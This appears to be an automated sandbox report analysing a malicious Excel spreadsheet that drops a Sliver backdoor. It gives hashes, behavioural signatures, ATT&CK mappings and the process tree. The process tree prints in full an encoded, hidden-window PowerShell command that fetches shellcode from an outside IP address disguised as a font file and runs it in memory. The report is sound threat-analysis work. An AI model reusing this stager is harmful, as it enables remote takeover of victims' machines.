sliver | bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e

General

Target

bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e.xls
Size

46KB
MD5

f0a405d9dfad843cd65fb032fcdc179f
SHA1

2ef5c97897837e42dded3e2770dee4f8545d613d
SHA256

bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e
SHA512

5a13aa94717114759d3a962c653b1a0edbc8db3c94fa937c470f761bb980f02da51d2995b18e31fe29b45e062ddc753b7a9a80e95a950e3326d543c716459d51
SSDEEP

768:C4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:xSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2024	1700	powershell.exe	82

Sliver RAT v2 6 IoCs

resource	yara_rule
behavioral2/memory/2024-59-0x0000020F49890000-0x0000020F4A30E000-memory.dmp	SliverRAT_v2
behavioral2/memory/2024-61-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp	SliverRAT_v2
behavioral2/memory/2024-62-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp	SliverRAT_v2
behavioral2/memory/2024-60-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp	SliverRAT_v2
behavioral2/memory/2024-63-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp	SliverRAT_v2
behavioral2/memory/2024-72-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 24 IoCs

flow	pid	Process
23	2024	powershell.exe
25	2024	powershell.exe
27	2024	powershell.exe
33	2024	powershell.exe
34	2024	powershell.exe
37	2024	powershell.exe
38	2024	powershell.exe
39	2024	powershell.exe
40	2024	powershell.exe
41	2024	powershell.exe
42	2024	powershell.exe
43	2024	powershell.exe
44	2024	powershell.exe
55	2024	powershell.exe
59	2024	powershell.exe
60	2024	powershell.exe
61	2024	powershell.exe
62	2024	powershell.exe
63	2024	powershell.exe
64	2024	powershell.exe
65	2024	powershell.exe
66	2024	powershell.exe
67	2024	powershell.exe
68	2024	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2024	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1700	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2024	powershell.exe
2024	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE
1700	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1700 wrote to memory of 2024	1700	EXCEL.EXE	86
PID 1700 wrote to memory of 2024	1700	EXCEL.EXE	86
PID 2024 wrote to memory of 2248	2024	powershell.exe	88
PID 2024 wrote to memory of 2248	2024	powershell.exe	88
PID 2248 wrote to memory of 4804	2248	csc.exe	90
PID 2248 wrote to memory of 4804	2248	csc.exe	90

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\anhznhya\anhznhya.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC525.tmp" "c:\Users\Admin\AppData\Local\Temp\anhznhya\CSC78745133EBBA4F37B1C7C971893A25CE.TMP"
      4⤵
      PID:4804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC525.tmp

Filesize
1KB

MD5
15ad244014a55fe624246e55d531d7a3

SHA1
beef96126fc70ebab6ae76c715e888c5ff5e96a1

SHA256
1c8362410ed4eb2a7eddae5e51c4c601e6866d0ba9a53d09038fc5fbdbbf2ba4

SHA512
af40bbd97246a778b381e4c68ec2d1d4c648c95cb42db4621d3f35aedd9c9de6e730376932dc0fad568550d9f9dc9a7296cf34505205f2bc59837e67d20ca526

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_unkqyar4.2z1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\anhznhya\anhznhya.dll

Filesize
3KB

MD5
86291bcf043f7ae89e71adff3e7b64ea

SHA1
b493ce15c45c636d29d8592ac629ce53ef2b9814

SHA256
2e4219d104e69e518ff994be84f6d69795a7d3b10ae984ad78c7f0477a0eb457

SHA512
e3cfb4355cf8a99487bd8f0194d19dfb77dfc765cd95b2eed61c073aab7a806273eab78ed0fa26b7e17fef5976ebf077675a53f00ae25ea9b7c3b4c13890ca13

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
dde82ef133f67ea2e43b51ee6d84520d

SHA1
be5c9b06e9ee2016799a398b26ab092455642247

SHA256
db9e25cb7b65b645cb855f3512520fa6b018851376bda929e887fe68ce1073fd

SHA512
4cb11d381a66dc431ab02bf915962989f80685239478bb50ba8c35d8678e6e8756b884f0566c0d047729de88d156de247561a434d55a5b6206dd36a84dd39cae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\anhznhya\CSC78745133EBBA4F37B1C7C971893A25CE.TMP

Filesize
652B

MD5
1be3189dbfc69372dd144a561e1af782

SHA1
64aa3fba8ecca4d51f3e6b9f842564cfaef9bfb1

SHA256
d3a8567fc9ec8761f78669092bdab544cd739f0e9d8dad989138353ed42fbadc

SHA512
1705e87aa91df40df5b021e4ca97ab6a2be12e652c05f4bacd21e961b0efd8389511312ac3c5986eca1d9d6908853ba2b3b87bdb3a50a6f6c6780240b9e4f45e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\anhznhya\anhznhya.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\anhznhya\anhznhya.cmdline

Filesize
369B

MD5
dd0922652d2df7cad32412e26479d460

SHA1
2579a40a69752bbbe0bc5bf8346e149400191bd7

SHA256
b408c01e94dd63a34008ed3e6a8a17605b44d5f8793881341c6cce62e6473769

SHA512
1aad5293c34da1805805e8d6e4548fcb1d8c57bd1f77baf8cd59e214d3918c37efed11a363807bbdeddc38a4296366e02137d87381a767242cfd8228a3a30219

Download Submit
memory/1700-25-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-5-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-9-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-12-0x00007FFFADF90000-0x00007FFFADFA0000-memory.dmp

Filesize
64KB

Download
memory/1700-8-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-7-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-15-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-14-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-16-0x00007FFFADF90000-0x00007FFFADFA0000-memory.dmp

Filesize
64KB

Download
memory/1700-13-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-26-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-1-0x00007FFFB0630000-0x00007FFFB0640000-memory.dmp

Filesize
64KB

Download
memory/1700-73-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-10-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-6-0x00007FFFB0630000-0x00007FFFB0640000-memory.dmp

Filesize
64KB

Download
memory/1700-11-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/1700-4-0x00007FFFB0630000-0x00007FFFB0640000-memory.dmp

Filesize
64KB

Download
memory/1700-3-0x00007FFFF064D000-0x00007FFFF064E000-memory.dmp

Filesize
4KB

Download
memory/1700-0-0x00007FFFB0630000-0x00007FFFB0640000-memory.dmp

Filesize
64KB

Download
memory/1700-2-0x00007FFFB0630000-0x00007FFFB0640000-memory.dmp

Filesize
64KB

Download
memory/1700-58-0x00007FFFF05B0000-0x00007FFFF07A5000-memory.dmp

Filesize
2.0MB

Download
memory/2024-59-0x0000020F49890000-0x0000020F4A30E000-memory.dmp

Filesize
10.5MB

Download
memory/2024-61-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp

Filesize
10.9MB

Download
memory/2024-62-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp

Filesize
10.9MB

Download
memory/2024-60-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp

Filesize
10.9MB

Download
memory/2024-63-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp

Filesize
10.9MB

Download
memory/2024-54-0x0000020F30CE0000-0x0000020F30CE8000-memory.dmp

Filesize
32KB

Download
memory/2024-72-0x0000020F4AD90000-0x0000020F4B876000-memory.dmp

Filesize
10.9MB

Download
memory/2024-29-0x0000020F48F80000-0x0000020F48FA2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads